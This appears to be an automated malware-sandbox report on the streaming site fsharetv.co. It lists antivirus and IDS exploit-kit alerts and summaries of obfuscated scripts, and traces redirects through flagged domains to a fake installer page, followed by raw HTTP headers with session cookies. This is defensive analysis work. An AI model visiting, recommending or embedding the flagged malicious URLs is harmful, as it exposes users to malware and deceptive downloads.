Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://fsharetv.co/

Overview

General Information

Sample URL:https://fsharetv.co/
Analysis ID:1575386
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML page contains hidden javascript code
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2728 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2016,i,16068684791565395002,4372320431885380425,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://fsharetv.co/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-15T12:38:17.607883+010020221121Exploit Kit Activity Detected192.168.2.164987954.225.185.110443TCP
2024-12-15T12:38:43.138671+010020221121Exploit Kit Activity Detected192.168.2.165000618.202.12.61443TCP
2024-12-15T12:38:45.356545+010020221121Exploit Kit Activity Detected192.168.2.165000952.210.2.133443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://lgzmq.employmehnt.com/block.js?b=4Avira URL Cloud: Label: malware

Phishing

barindex
Source: 0.9..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://d2w9cdu84xc4eq.cloudfront.net/lMHl4TDlTFhY... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The heavy obfuscation and lack of transparency further increase the risk. Overall, this script demonstrates clear malicious intent and should be considered a high-risk threat.
Source: 1.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://arketingefifortw.com/MnB6NXdTEhlYSFNNGBMCQ... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. While some contextual factors, such as the use of a known domain (cloudfront.net), may suggest legitimate analytics or tracking functionality, the overall behavior and lack of transparency raise significant security concerns.
Source: 1.17.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://lgzmq.employmehnt.com/UARUK?tag_id=1092278... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The script creates a full-screen overlay with a button, which could be used for phishing or other malicious purposes. While the script does not explicitly contain malicious code, its overall behavior and the potential for abuse warrant a high-risk score.
Source: https://lgzmq.employmehnt.com/UARUK?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3A%2F%2Fgetrunkhomuto.info%2F%3Ftid%3D1092278%26noocp%3D1&hop=7&geo=USHTTP Parser: Base64 decoded: g><g></g><g></g></svg>
Source: https://lgzmq.employmehnt.com/UARUK?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3A%2F%2Fgetrunkhomuto.info%2F%3Ftid%3D1092278%26noocp%3D1&hop=7&geo=USHTTP Parser: No favicon
Source: https://birthjeans.icu/?affId=2923&o=473&s1=WW_Opera_Inst_55CPA_201024_LP2&t=download_s1&title=install&click_id=6854923038828080143&source=1092278&s2=649654HTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: getrunkhomuto.info to https://lgzmq.employmehnt.com/uaruk?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3a%2f%2fgetrunkhomuto.info%2f%3ftid%3d1092278%26noocp%3d1&hop=7&geo=us
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: getrunkhomuto.info to https://birthjeans.icu/?affid=2923&o=473&s1=ww_opera_inst_55cpa_201024_lp2&t=download_s1&title=install&click_id=6854923038828080143&source=1092278&s2=649654
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.16:49879 -> 54.225.185.110:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.16:50006 -> 18.202.12.61:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.16:50009 -> 52.210.2.133:443
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: fsharetv.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/disk.css?t=1589873325348 HTTP/1.1Host: fsharetv.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOTQ1NmFjMzEtNTkxYS00ZjY5LTgxN2UtMWM0NTlkZjc4MzNmL2ltYWdlL2ltYWdlXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: fsharetv.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
Source: global trafficHTTP traffic detected: GET /js/disk.js?t=1589873325348 HTTP/1.1Host: fsharetv.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOTQ1NmFjMzEtNTkxYS00ZjY5LTgxN2UtMWM0NTlkZjc4MzNmL2ltYWdlL2ltYWdlXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/sweetalert2@11 HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery.devbridge-autocomplete/1.4.11/jquery.autocomplete.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMDdmZGU3NDQtY2E5My00ZTliLWIzOTUtMTY4ZGI1YjdiNjk3XkEyXkFqcGdeQXVyNTA4NzY1MzY@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZWQyYmRlYzItZTdiYS00MmIwLThkMGMtMGJjYzQ0NThmNTMyXkEyXkFqcGdeQXVyNzM0MDQ1Mw@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYjg3YjMyNGYtMWI5YS00ODgyLWIwOWUtODY2NzhmZGIyMzI1XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZGViYTNjMTktMTQ3OS00NWNkLTk2Y2MtMGQ4M2JjZTUwOGRlXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNzM2YjIwMzgtZTg4Yy00NmJlLWIzOTYtYTQ0Zjc3NjIyZDcyXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZDk3YzBiOTItMTY3My00MWZhLWI5MTYtNDU5Yzk3NThjZDQzXkEyXkFqcGdeQXVyNzM3NDU4Njk@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?udcwd=1092278 HTTP/1.1Host: d2w9cdu84xc4eq.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/fsharetv.png HTTP/1.1Host: fsharetv.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery.devbridge-autocomplete/1.4.11/jquery.autocomplete.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZTYyMWUyOTQtM2VlNS00YTA4LWI0YTgtODg1ZDg5ZDQzYWI5XkEyXkFqcGdeQXVyNzc5MjA3OA@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: fsharetv.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYTk4YjhmNGMtOTZkYi00MjNmLThmZGItMGYyNDljNTdhNDA1XkEyXkFqcGdeQXVyNDE5MTU2MDE@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZDFlMjEyM2QtMGQ1NS00NWYzLTllMTItZTVmODcxZDY3ZDMzXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMDVkMWVmMjYtNjE3YS00YWIxLWE5MDgtMWUzMTIyYWJhMzA1XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMGJhOTk0NjEtYzcxNi00ZjQwLWE0ZDItMGZhMGYzMTRlMWZhXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
